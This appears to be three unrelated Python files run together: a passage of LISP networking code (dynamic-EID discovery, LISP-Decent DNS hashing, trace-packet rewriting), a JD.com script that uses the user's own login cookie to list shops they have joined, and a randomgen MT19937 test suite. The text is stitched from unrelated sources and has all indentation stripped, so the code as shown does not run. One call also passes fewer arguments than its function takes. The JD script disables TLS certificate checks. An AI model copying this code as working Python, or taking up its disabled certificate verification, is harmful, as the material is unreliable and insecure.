#
if (db.dynamic_eid_configured()):
interface = lisp_allow_dynamic_eid(device, seid)
if (interface != None and lisp_i_am_itr):
lisp_itr_discover_eid(db, seid, device, interface)
else:
lprint(("Disallow dynamic source-EID {} " + \
"on interface {}").format(e, device))
#endif
#endif
else:
lprint("Punt from non-EID source {}".format(e))
#endif
#endif
#
# Do Map-Request processing on destination.
#
if (deid):
mc = lisp_map_cache_lookup(seid, deid)
if (mc == None or mc.action == LISP_SEND_MAP_REQUEST_ACTION):
#
# Check if we should rate-limit Map-Request and if not send
# Map-Request.
#
if (lisp_rate_limit_map_request(seid, deid)): return
lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
seid, deid, None)
else:
e = green(deid.print_address(), False)
lprint("Map-cache entry for {} already exists".format(e))
#endif
#endif
return
#enddef
#
# lisp_ipc_map_cache_entry
#
# Callback from class lisp_cache.walk_cache().
#
def lisp_ipc_map_cache_entry(mc, jdata):
entry = lisp_write_ipc_map_cache(True, mc, dont_send=True)
jdata.append(entry)
return([True, jdata])
#enddef
#
# lisp_ipc_walk_map_cache
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_ipc_walk_map_cache(mc, jdata):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_ipc_map_cache_entry(mc, jdata))
if (mc.source_cache == None): return([True, jdata])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
return([True, jdata])
#enddef
#
# lisp_itr_discover_eid
#
# Put dynamic-EID in db.dynamic_eids{} array.
#
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
lisp_ipc_listen_socket):
eid_str = eid.print_address()
if (db.dynamic_eids.has_key(eid_str)):
db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
return
#endif
#
# Add to list.
#
dyn_eid = lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = routed_interface
dyn_eid.last_packet = lisp_get_timestamp()
dyn_eid.get_timeout(routed_interface)
db.dynamic_eids[eid_str] = dyn_eid
routed = ""
if (input_interface != routed_interface):
routed = ", routed-interface " + routed_interface
#endif
eid_string = green(eid_str, False) + bold(" discovered", False)
lprint("Dynamic-EID {} on interface {}{}, timeout {}".format( \
eid_string,input_interface, routed, dyn_eid.timeout))
#
# Tell ETR process so it can register dynamic-EID.
#
ipc = "learn%{}%{}".format(eid_str, routed_interface)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
return
#enddef
#
# lisp_retry_decap_keys
#
# A decap-key was copied from x.x.x.x:p to x.x.x.x, but it was the wrong one.
# Copy x.x.x.x.q to x.x.x.x. This is an expensive function. But it is hardly
# used. And once it is used for a particular addr_str, it shouldn't be used
# again.
#
# This function is only used when an ICV error occurs when x.x.x.x is the
# crypto-key used.
#
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
if (lisp_search_decap_keys == False): return
#
# Only use this function when the key matched was not port based.
#
if (addr_str.find(":") != -1): return
parent = lisp_crypto_keys_by_rloc_decap[addr_str]
for key in lisp_crypto_keys_by_rloc_decap:
#
# Find entry that has same source RLOC.
#
if (key.find(addr_str) == -1): continue
#
# Skip over parent entry.
#
if (key == addr_str): continue
#
# If crypto-keys the same, go to find next one.
#
entry = lisp_crypto_keys_by_rloc_decap[key]
if (entry == parent): continue
#
# Try ICV check. If works, then go to this key.
#
crypto_key = entry[1]
if (packet_icv != crypto_key.do_icv(packet, iv)):
lprint("Test ICV with key {} failed".format(red(key, False)))
continue
#endif
lprint("Changing decap crypto key to {}".format(red(key, False)))
lisp_crypto_keys_by_rloc_decap[addr_str] = entry
#endif
return
#enddef
#
# lisp_decent_pull_xtr_configured
#
# Return True if configured LISP-Decent modulus is not 0. Meaning we are using
# the LISP-Decent pull-based mapping system.
#
def lisp_decent_pull_xtr_configured():
return(lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)
#enddef
#
# lisp_is_decent_dns_suffix
#
# Return True if supplied DNS name ends with a configured LISP-Decent DNS
# suffix.
#
def lisp_is_decent_dns_suffix(dns_name):
if (lisp_decent_dns_suffix == None): return(False)
name = dns_name.split(".")
name = ".".join(name[1::])
return(name == lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_index
#
# Hash the EID-prefix and mod the configured LISP-Decent modulus value.
#
def lisp_get_decent_index(eid):
eid_str = eid.print_prefix()
hash_value = hashlib.sha256(eid_str).hexdigest()
index = int(hash_value, 16) % lisp_decent_modulus
return(index)
#enddef
#
# lisp_get_decent_dns_name
#
# Based on EID, get index and prepend to LISP-Decent DNS name suffix.
#
def lisp_get_decent_dns_name(eid):
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_dns_name_from_str
#
# Supplied source and group are addresses passed as strings. Build in internal
# lisp_address() to pass into lisp_get_decent_index().
#
def lisp_get_decent_dns_name_from_str(iid, eid_str):
eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_trace_append
#
# Append JSON data to trace packet. If this is the ETR, the EIDs will be
# swapped to return packet to originator.
#
# Returning False means the caller should return (and not forward the packet).
#
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None):
offset = 28 if packet.inner_version == 4 else 48
trace_pkt = packet.packet[offset::]
trace = lisp_trace()
if (trace.decode(trace_pkt) == False):
lprint("Could not decode JSON portion of a LISP-Trace packet")
return(False)
#endif
next_rloc = "?" if packet.outer_dest.is_null() else \
packet.outer_dest.print_address_no_iid()
#
# Display port if in this call is a encapsulating RTR using a translated
# RLOC.
#
if (next_rloc != "?" and packet.encap_port != LISP_DATA_PORT):
if (ed == "encap"): next_rloc += ":{}".format(packet.encap_port)
#endif
#
# Add node entry data for the encapsulation or decapsulation.
#
entry = {}
entry["node"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else \
"RTR" if lisp_i_am_rtr else "?"
srloc = packet.outer_source
if (srloc.is_null()): srloc = lisp_myrlocs[0]
entry["srloc"] = srloc.print_address_no_iid()
#
# In the source RLOC include the ephemeral port number of the ltr client
# so RTRs can return errors to the client behind a NAT.
#
if (entry["node"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT):
entry["srloc"] += ":{}".format(packet.inner_sport)
#endif
entry["hostname"] = lisp_hostname
key = ed + "-timestamp"
entry[key] = lisp_get_timestamp()
#
# If this is a ETR decap entry and the drloc is "?", the packet came in on
# lisp_etr_nat_data_plane() where the kernel strips the outer header. Get
# the local/private RLOC from our database-mapping.
#
if (next_rloc == "?" and entry["node"] == "ETR"):
db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db != None and len(db.rloc_set) >= 1):
next_rloc = db.rloc_set[0].rloc.print_address_no_iid()
#endif
#endif
entry["drloc"] = next_rloc
#
# If there is a reason there is no dest RLOC, include it.
#
if (next_rloc == "?" and reason != None):
entry["drloc"] += " ({})".format(reason)
#endif
#
# Build seid->deid record if it does not exist. Then append node entry
# to record below, in the search loop.
#
seid = packet.inner_source.print_address()
deid = packet.inner_dest.print_address()
if (trace.packet_json == []):
rec = {}
rec["seid"] = seid
rec["deid"] = deid
rec["paths"] = []
trace.packet_json.append(rec)
#endif
#
# Search for record. If we appending the first ITR node entry, get its
# RLOC address in case we have to return-to-sender.
#
for rec in trace.packet_json:
if (rec["deid"] != deid): continue
rec["paths"].append(entry)
break
#endfor
#
# If we are destination-EID, add a new record deid->seid if we have not
# completed a round-trip. The ETR will deliver this packet from its own
# EID which means the co-located ITR will pcap the packet and add its
# encap node entry.
#
swap = False
if (len(trace.packet_json) == 1 and trace.myeid(packet.inner_dest)):
rec = {}
rec["seid"] = deid
rec["deid"] = seid
rec["paths"] = []
trace.packet_json.append(rec)
swap = True
#endif
#
# Print the JSON packet after we appended data to it. Put the new JSON in
# packet. Fix up lengths and checksums from inner headers.
#
trace.print_trace()
trace_pkt = trace.encode()
#
# If next_rloc is not known, we need to return packet to sender.
#
# Otherwise we are forwarding a packet that is about to encapsulated or we
# are forwarding a packet that was just decapsulated with the addresses
# swapped so we can turn it around.
#
sender_rloc = trace.packet_json[0]["paths"][0]["srloc"]
if (next_rloc == "?"):
lprint("LISP-Trace return to sender RLOC {}".format(sender_rloc))
trace.return_to_sender(lisp_socket, sender_rloc, trace_pkt)
return(False)
#endif
#
# Compute length of trace packet. This includes the UDP header, Trace
# header, and JSON payload.
#
udplen = trace.packet_length()
#
# Fix up UDP length and recompute UDP checksum if IPv6 packet, zero
# otherwise. Only do checksum when the Trace went round-trip and this is
# the local ETR delivery EID-based Trace packet to the client ltr.
#
headers = packet.packet[0:offset]
p = struct.pack("HH", socket.htons(udplen), 0)
headers = headers[0:offset-4] + p
if (packet.inner_version == 6 and entry["node"] == "ETR" and
len(trace.packet_json) == 2):
udp = headers[offset-8::] + trace_pkt
udp = lisp_udp_checksum(seid, deid, udp)
headers = headers[0:offset-8] + udp[0:8]
#endif
#
# If we are swampping addresses, do it here so the JSON append and IP
# header fields changes are all reflected in new IPv4 header checksum.
#
if (swap):
if (packet.inner_version == 4):
headers = headers[0:12] + headers[16:20] + headers[12:16] + \
headers[22:24] + headers[20:22] + headers[24::]
else:
headers = headers[0:8] + headers[24:40] + headers[8:24] + \
headers[42:44] + headers[40:42] + headers[44::]
#endif
d = packet.inner_dest
packet.inner_dest = packet.inner_source
packet.inner_source = d
#endif
#
# Fix up IP length.
#
offset = 2 if packet.inner_version == 4 else 4
iplen = 20 + udplen if packet.inner_version == 4 else udplen
h = struct.pack("H", socket.htons(iplen))
headers = headers[0:offset] + h + headers[offset+2::]
#
# Fix up IPv4 header checksum.
#
if (packet.inner_version == 4):
c = struct.pack("H", 0)
headers = headers[0:10] + c + headers[12::]
h = lisp_ip_checksum(headers[0:20])
headers = h + headers[20::]
#endif
#
# Caller is forwarding packet, either as an ITR, RTR, or ETR.
#
packet.packet = headers + trace_pkt
return(True)
#enddef
#------------------------------------------------------------------------------
|
get_user_brand_member.py
|
"""
获取已经入会的 venderID
---
user_shop_venderId.txt
"""
import os
import sys
import requests
import re
import threading
# 这里填写遍历的 cookie
COOKIE = "" or "pt_key=" + sys.argv[1] + ";pt_pin=" + sys.argv[2]
THREAD = 8
def get_file_path(file_name=""):
"""
获取文件绝对路径, 防止在某些情况下报错
:param file_name: 文件名
:return:
"""
return os.path.join(os.path.split(sys.argv[0])[0], file_name)
def get_venderId(shop_id):
"""
将 `shop_id` 转换为 `venderId`
:param shop_id:
:return: bool: 是否成功, str: venderID
"""
try:
res = requests.get("https://shop.m.jd.com/?shopId=" + str(shop_id), verify=False)
_res = re.compile("venderId: '(\\d*)'").findall(res.text)
if res.status_code == 200 and len(_res):
return True, re.compile("venderId: '(\\d*)'").findall(res.text)[0]
else:
return False, None
except:
return False, None
def _get_shop_open_card_info(cookie, venderId):
params = {
"appid": "jd_shop_member",
"functionId": "getShopOpenCardInfo",
"body": '{"venderId":"' + str(venderId) + '","channel":406}',
"client": "H5",
"clientVersion": "9.2.0",
"uuid": "88888"
}
host = "api.m.jd.com"
url = "https://api.m.jd.com/client.action"
headers = {
"Cookie": cookie,
"Host": host,
"Referer": "https://m.jd.com",
"User-Agent": "Mozilla/5.0 (Linux; Android 9; COR-AL00) AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/77.0.3865.116 Mobile Safari/537.36 EdgA/46.03.4.5155 "
}
try:
res = requests.get(url, params=params, headers=headers, verify=False)
# print(res.json())
if res.status_code == 200 and res.json()['success']:
return True, str(venderId), bool(res.json()['result']['userInfo']['openCardStatus'])
else:
return False, str(venderId), False
except:
return False, str(venderId), False
def get_user_brand_member(thread):
global process
for _ in shop_ids[thread::THREAD]:
process[0] += 1
info = _get_shop_open_card_info(COOKIE, get_venderId(int(_))[1])
if info[0] and info[2]:
process[1] += 1
open(get_file_path("user_shop_venderId.txt"), "a", encoding="utf-8").write(info[1] + "\n")
print("\r已遍历{}个店铺,其中你已入会{}个, 结果保存在`user_shop_venderId.txt`".format(process[0], process[1]), end="")
if __name__ == '__main__':
process = [0, 0]
# 忽略警告
requests.packages.urllib3.disable_warnings()
open(get_file_path("user_shop_venderId.txt"), "w").close()
shop_ids = open(get_file_path("shopid.txt"), "r").readlines()
for thread in range(THREAD):
threading.Thread(target=get_user_brand_member, args=(thread,)).start()
|
test_generator_mt19937.py
|
from distutils.version import LooseVersion
import hashlib
import sys
import warnings
import numpy as np
from numpy.linalg import LinAlgError
from numpy.testing import (
assert_,
assert_allclose,
assert_array_almost_equal,
assert_array_equal,
assert_equal,
assert_no_warnings,
assert_raises,
assert_warns,
suppress_warnings,
)
import pytest
from randomgen import MT19937, Generator
from randomgen.tests.test_direct import assert_state_equal
random = Generator(MT19937(mode="legacy"))
NP_LT_118 = LooseVersion(np.__version__) < LooseVersion("1.18.0")
JUMP_TEST_DATA = {
("_jump_tester", (0,), 10): {
"initial": {"key_md5": "64eaf265d2203179fb5ffb73380cd589", "pos": 9},
"jumped": {"key_md5": "14e9a7d1e247f0f8565b77784c9a6b83", "pos": 601},
},
("_jump_tester", (384908324,), 312): {
"initial": {"key_md5": "e99708a47b82ff51a2c7b0625b81afb5", "pos": 311},
"jumped": {"key_md5": "8bfd5e1ab46befd06cc54146541f1ce8", "pos": 279},
},
("_jump_tester", (839438204, 980239840, 859048019, 821), 511): {
"initial": {"key_md5": "9fcd6280df9199785e17e93162ce283c", "pos": 510},
"jumped": {"key_md5": "f8ac8f010bd3eabc8afbc8b690220177", "pos": 478},
},
("jumped", (0,), 10): {
"initial": {"key_md5": "64eaf265d2203179fb5ffb73380cd589", "pos": 9},
"jumped": {"key_md5": "8cb7b061136efceef5217a9ce2cc9a5a", "pos": 598},
},
("jumped", (384908324,), 312): {
"initial": {"key_md5": "e99708a47b82ff51a2c7b0625b81afb5", "pos": 311},
"jumped": {"key_md5": "2ecdbfc47a895b253e6e19ccb2e74b90", "pos": 276},
},
("jumped", (839438204, 980239840, 859048019, 821), 511): {
"initial": {"key_md5": "9fcd6280df9199785e17e93162ce283c", "pos": 510},
"jumped": {"key_md5": "433b85229f2ed853cde06cd872818305", "pos": 475},
},
}
@pytest.fixture(scope="module", params=[True, False])
def endpoint(request):
return request.param
class TestSeed(object):
def test_scalar(self):
s = Generator(MT19937(0, mode="legacy"))
assert_equal(s.integers(1000), 684)
s = Generator(MT19937(4294967295, mode="legacy"))
assert_equal(s.integers(1000), 419)
def test_array(self):
s = Generator(MT19937(range(10), mode="legacy"))
assert_equal(s.integers(1000), 468)
s = Generator(MT19937(np.arange(10), mode="legacy"))
assert_equal(s.integers(1000), 468)
s = Generator(MT19937([0], mode="legacy"))
assert_equal(s.integers(1000), 973)
s = Generator(MT19937([4294967295], mode="legacy"))
assert_equal(s.integers(1000), 265)
def test_invalid_scalar(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, MT19937, -0.5, mode="legacy")
assert_raises(ValueError, MT19937, -1, mode="legacy")
def test_invalid_array(self):
# seed must be an unsigned 32 bit integer
assert_raises(TypeError, MT19937, [-0.5], mode="legacy")
assert_raises(ValueError, MT19937, [-1], mode="legacy")
assert_raises(ValueError, MT19937, [4294967296], mode="legacy")
assert_raises(ValueError, MT19937, [1, 2, 4294967296], mode="legacy")
assert_raises(ValueError, MT19937, [1, -2, 4294967296], mode="legacy")
def test_noninstantized_bitgen(self):
assert_raises(ValueError, Generator, MT19937)
class TestBinomial(object):
def test_n_zero(self):
# Tests the corner case of n == 0 for the binomial distribution.
# binomial(0, p) should be zero for any p in [0, 1].
# This test addresses issue #3480.
zeros = np.zeros(2, dtype="int")
for p in [0, 0.5, 1]:
assert_(random.binomial(0, p) == 0)
assert_array_equal(random.binomial(zeros, p), zeros)
def test_p_is_nan(self):
# Issue #4571.
assert_raises(ValueError, random.binomial, 1, np.nan)
class TestMultinomial(object):
def test_basic(self):
random.multinomial(100, [0.2, 0.8])
def test_zero_probability(self):
random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0])
def test_int_negative_interval(self):
assert_(-5 <= random.integers(-5, -1) < -1)
x = random.integers(-5, -1, 5)
assert_(np.all(-5 <= x))
assert_(np.all(x < -1))
def test_size(self):
# gh-3173
p = [0.5, 0.5]
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2))
assert_equal(random.multinomial(1, p, [2, 2]).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, (2, 2)).shape, (2, 2, 2))
assert_equal(random.multinomial(1, p, np.array((2, 2))).shape, (2, 2, 2))
assert_raises(TypeError, random.multinomial, 1, p, float(1))
def test_invalid_prob(self):
assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2])
assert_raises(ValueError, random.multinomial, 100, [-0.1, 0.9])
def test_invalid_n(self):
assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2])
assert_raises(ValueError, random.multinomial, [-1] * 10, [0.8, 0.2])
def test_p_noncontiguous(self):
p = np.arange(15.0)
p /= np.sum(p[1::3])
pvals = p[1::3]
random.seed(1432985819)
non_contig = random.multinomial(100, pvals=pvals)
random.seed(1432985819)
contig = random.multinomial(100, pvals=np.ascontiguousarray(pvals))
assert_array_equal(non_contig, contig)
def test_large_p(self):
with pytest.raises(ValueError, match=r"sum\(pvals"):
random.multinomial(100, np.array([0.7, 0.6, 0.5, 0]))
class TestSetState(object):
def setup(self):
self.seed = 1234567890
self.rg = Generator(MT19937(self.seed, mode="legacy"))
self.bit_generator = self.rg.bit_generator
self.state = self.bit_generator.state
self.legacy_state = (
self.state["bit_generator"],
self.state["state"]["key"],
self.state["state"]["pos"],
)
def test_basic(self):
with pytest.deprecated_call():
old = self.rg.tomaxint(16)
self.bit_generator.state = self.state
with pytest.deprecated_call():
new = self.rg.tomaxint(16)
assert_(np.all(old == new))
def test_gaussian_reset(self):
# Make sure the cached every-other-Gaussian is reset.
old = self.rg.standard_normal(size=3)
self.bit_generator.state = self.state
new = self.rg.standard_normal(size=3)
assert_(np.all(old == new))
def test_gaussian_reset_in_media_res(self):
# When the state is saved with a cached Gaussian, make sure the
# cached Gaussian is restored.
self.rg.standard_normal()
state = self.bit_generator.state
old = self.rg.standard_normal(size=3)
self.bit_generator.state = state
new = self.rg.standard_normal(size=3)
assert_(np.all(old == new))
def test_negative_binomial(self):
# Ensure that the negative binomial results take floating point
# arguments without truncation.
self.rg.negative_binomial(0.5, 0.5)
class TestIntegers(object):
rfunc = random.integers
# valid integer/boolean types
itype = [
bool,
np.int8,
np.uint8,
np.int16,
np.uint16,
np.int32,
np.uint32,
np.int64,
np.uint64,
]
def test_unsupported_type(self, endpoint):
assert_raises(TypeError, self.rfunc, 1, endpoint=endpoint, dtype=float)
def test_bounds_checking(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
assert_raises(
ValueError, self.rfunc, lbnd - 1, ubnd, endpoint=endpoint, dtype=dt
)
assert_raises(
ValueError, self.rfunc, lbnd, ubnd + 1, endpoint=endpoint, dtype=dt
)
assert_raises(
ValueError, self.rfunc, ubnd, lbnd, endpoint=endpoint, dtype=dt
)
assert_raises(ValueError, self.rfunc, 1, 0, endpoint=endpoint, dtype=dt)
assert_raises(
ValueError, self.rfunc, [lbnd - 1], ubnd, endpoint=endpoint, dtype=dt
)
assert_raises(
ValueError, self.rfunc, [lbnd], [ubnd + 1], endpoint=endpoint, dtype=dt
)
assert_raises(
ValueError, self.rfunc, [ubnd], [lbnd], endpoint=endpoint, dtype=dt
)
assert_raises(ValueError, self.rfunc, 1, [0], endpoint=endpoint, dtype=dt)
def test_bounds_checking_array(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + (not endpoint)
assert_raises(
ValueError,
self.rfunc,
[lbnd - 1] * 2,
[ubnd] * 2,
endpoint=endpoint,
dtype=dt,
)
assert_raises(
ValueError,
self.rfunc,
[lbnd] * 2,
[ubnd + 1] * 2,
endpoint=endpoint,
dtype=dt,
)
assert_raises(
ValueError, self.rfunc, ubnd, [lbnd] * 2, endpoint=endpoint, dtype=dt
)
assert_raises(
ValueError, self.rfunc, [1] * 2, 0, endpoint=endpoint, dtype=dt
)
def test_rng_zero_and_extremes(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
is_open = not endpoint
tgt = ubnd - 1
assert_equal(
self.rfunc(tgt, tgt + is_open, size=1000, endpoint=endpoint, dtype=dt),
tgt,
)
assert_equal(
self.rfunc(
[tgt], tgt + is_open, size=1000, endpoint=endpoint, dtype=dt
),
tgt,
)
tgt = lbnd
assert_equal(
self.rfunc(tgt, tgt + is_open, size=1000, endpoint=endpoint, dtype=dt),
tgt,
)
assert_equal(
self.rfunc(
tgt, [tgt + is_open], size=1000, endpoint=endpoint, dtype=dt
),
tgt,
)
tgt = (lbnd + ubnd) // 2
assert_equal(
self.rfunc(tgt, tgt + is_open, size=1000, endpoint=endpoint, dtype=dt),
tgt,
)
assert_equal(
self.rfunc(
[tgt], [tgt + is_open], size=1000, endpoint=endpoint, dtype=dt
),
tgt,
)
def test_rng_zero_and_extremes_array(self, endpoint):
size = 1000
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
tgt = ubnd - 1
assert_equal(self.rfunc([tgt], [tgt + 1], size=size, dtype=dt), tgt)
assert_equal(self.rfunc([tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(
self.rfunc([tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt
)
tgt = lbnd
assert_equal(self.rfunc([tgt], [tgt + 1], size=size, dtype=dt), tgt)
assert_equal(self.rfunc([tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(
self.rfunc([tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt
)
tgt = (lbnd + ubnd) // 2
assert_equal(self.rfunc([tgt], [tgt + 1], size=size, dtype=dt), tgt)
assert_equal(self.rfunc([tgt] * size, [tgt + 1] * size, dtype=dt), tgt)
assert_equal(
self.rfunc([tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt
)
def test_full_range(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError(
"No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e)
)
def test_full_range_array(self, endpoint):
# Test for ticket #1690
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
try:
self.rfunc([lbnd] * 2, [ubnd], endpoint=endpoint, dtype=dt)
except Exception as e:
raise AssertionError(
"No error should have been raised, "
"but one was with the following "
"message:\n\n%s" % str(e)
)
def test_in_bounds_fuzz(self, endpoint):
# Don"t use fixed seed
random.bit_generator.seed()
for dt in self.itype[1:]:
for ubnd in [4, 8, 16]:
vals = self.rfunc(
2, ubnd - endpoint, size=2 ** 16, endpoint=endpoint, dtype=dt
)
assert_(vals.max() < ubnd)
assert_(vals.min() >= 2)
vals = self.rfunc(0, 2 - endpoint, size=2 ** 16, endpoint=endpoint, dtype=bool)
assert_(vals.max() < 2)
assert_(vals.min() >= 0)
def test_scalar_array_equiv(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt is bool else np.iinfo(dt).min
ubnd = 2 if dt is bool else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
size = 1000
random.bit_generator.seed(1234)
scalar = self.rfunc(lbnd, ubnd, size=size, endpoint=endpoint, dtype=dt)
random.bit_generator.seed(1234)
scalar_array = self.rfunc(
[lbnd], [ubnd], size=size, endpoint=endpoint, dtype=dt
)
random.bit_generator.seed(1234)
array = self.rfunc(
[lbnd] * size, [ubnd] * size, size=size, endpoint=endpoint, dtype=dt
)
assert_array_equal(scalar, scalar_array)
assert_array_equal(scalar, array)
def test_repeatability(self, endpoint):
import hashlib
# We use a md5 hash of generated sequences of 1000 samples
# in the range [0, 6) for all but bool, where the range
# is [0, 2). Hashes are for little endian numbers.
tgt = {
"bool": "7dd3170d7aa461d201a65f8bcf3944b0",
"int16": "1b7741b80964bb190c50d541dca1cac1",
"int32": "4dc9fcc2b395577ebb51793e58ed1a05",
"int64": "17db902806f448331b5a758d7d2ee672",
"int8": "27dd30c4e08a797063dffac2490b0be6",
"uint16": "1b7741b80964bb190c50d541dca1cac1",
"uint32": "4dc9fcc2b395577ebb51793e58ed1a05",
"uint64": "17db902806f448331b5a758d7d2ee672",
"uint8": "27dd30c4e08a797063dffac2490b0be6",
}
for dt in self.itype[1:]:
random.bit_generator.seed(1234)
# view as little endian for hash
if sys.byteorder == "little":
val = self.rfunc(
0, 6 - endpoint, size=1000, endpoint=endpoint, dtype=dt
)
else:
val = self.rfunc(
0, 6 - endpoint, size=1000, endpoint=endpoint, dtype=dt
).byteswap()
res = hashlib.md5(val.view(np.int8)).hexdigest()
assert_(tgt[np.dtype(dt).name] == res)
# bools do not depend on endianness
random.bit_generator.seed(1234)
val = self.rfunc(
0, 2 - endpoint, size=1000, endpoint=endpoint, dtype=bool
).view(np.int8)
res = hashlib.md5(val).hexdigest()
assert_(tgt[np.dtype(bool).name] == res)
def test_repeatability_broadcasting(self, endpoint):
for dt in self.itype:
lbnd = 0 if dt in (bool, np.bool_) else np.iinfo(dt).min
ubnd = 2 if dt in (bool, np.bool_) else np.iinfo(dt).max + 1
ubnd = ubnd - 1 if endpoint else ubnd
# view as little endian for hash
random.bit_generator.seed(1234)
val = self.rfunc(lbnd, ubnd, size=1000, endpoint=endpoint, dtype=dt)
random.bit_generator.seed(1234)
val_bc = self.rfunc([lbnd] * 1000, ubnd, endpoint=endpoint, dtype=dt)
assert_array_equal(val, val_bc)
random.bit_generator.seed(1234)
val_bc = self.rfunc(
[lbnd] * 1000, [ubnd] * 1000, endpoint=endpoint, dtype=dt
)
assert_array_equal(val, val_bc)
def test_repeatability_32bit_boundary_broadcasting(self):
desired = np.array(
[
[
[4184714646, 2953452547, 3636115811],
[3137091686, 500004980, 1758274813],
[827841543, 2071399968, 2653935293],
],
[
[1980473914, 2331635770, 643122924],
[806373568, 3436742405, 3326492796],
[819438482, 2041859381, 1972373725],
],
[
[2973988042, 1073437830, 395026719],
[2154927168, 964445294, 449660552],
[4126967444, 1410100955, 3481829584],
],
[
[136169376, 332583752, 1486552164],
[2199706765, 2840948792, 1367639842],
[3733647586, 810727718, 3455450384],
],
[
[2374161015, 433367801, 3216002152],
[595355362, 342429046, 2159480359],
[3577969687, 2369902420, 764825175],
],
]
)
for size in [None, (5, 3, 3)]:
random = Generator(MT19937(12345, mode="sequence"))
x = random.integers(
[[-1], [0], [1]], [2 ** 32 - 1, 2 ** 32, 2 ** 32 + 1], size=size
)
assert_array_equal(x, desired if size is not None else desired[0])
def test_int64_uint64_broadcast_exceptions(self, endpoint):
configs = {
np.uint64: ((0, 2 ** 65), (-1, 2 ** 62), (10, 9), (0, 0)),
np.int64: (
(0, 2 ** 64),
(-(2 ** 64), 2 ** 62),
(10, 9),
(0, 0),
(-(2 ** 63) - 1, -(2 ** 63) - 1),
),
}
for dtype in configs:
for config in configs[dtype]:
low, high = config
high = high - endpoint
low_a = np.array([[low] * 10])
high_a = np.array([high] * 10)
assert_raises(
ValueError,
random.integers,
low,
high,
endpoint=endpoint,
dtype=dtype,
)
assert_raises(
ValueError,
random.integers,
low_a,
high,
endpoint=endpoint,
dtype=dtype,
)
assert_raises(
ValueError,
random.integers,
low,
high_a,
endpoint=endpoint,
dtype=dtype,
)
assert_raises(
ValueError,
random.integers,
low_a,
high_a,
endpoint=endpoint,
dtype=dtype,
)
low_o = np.array([[low] * 10], dtype=object)
high_o = np.array([high] * 10, dtype=object)
assert_raises(
ValueError,
random.integers,
low_o,
high,
endpoint=endpoint,
dtype=dtype,
)
assert_raises(
ValueError,
random.integers,
low,
high_o,
endpoint=endpoint,
dtype=dtype,
)
assert_raises(
ValueError,
random.integers,
low_o,
high_o,
endpoint=endpoint,
dtype=dtype,
)
def test_int64_uint64_corner_case(self, endpoint):
# When stored in Numpy arrays, `lbnd` is casted
# as np.int64, and `ubnd` is casted as np.uint64.
# Checking whether `lbnd` >= `ubnd` used to be
# done solely via direct comparison, which is incorrect
# because when Numpy tries to compare both numbers,
# it casts both to np.float64 because there is
# no integer superset of np.int64 and np.uint64. However,
# `ubnd` is too large to be represented in np.float64,
# causing it be round down to np.iinfo(np.int64).max,
# leading to a ValueError because `lbnd` now equals
# the new `ubnd`.
dt = np.int64
tgt = np.iinfo(np.int64).max
lbnd = np.int64(np.iinfo(np.int64).max)
ubnd = np.uint64(np.iinfo(np.int64).max + 1 - endpoint)
# None of these function calls should
# generate a ValueError now.
actual = random.integers(lbnd, ubnd, endpoint=endpoint, dtype=dt)
assert_equal(actual, tgt)
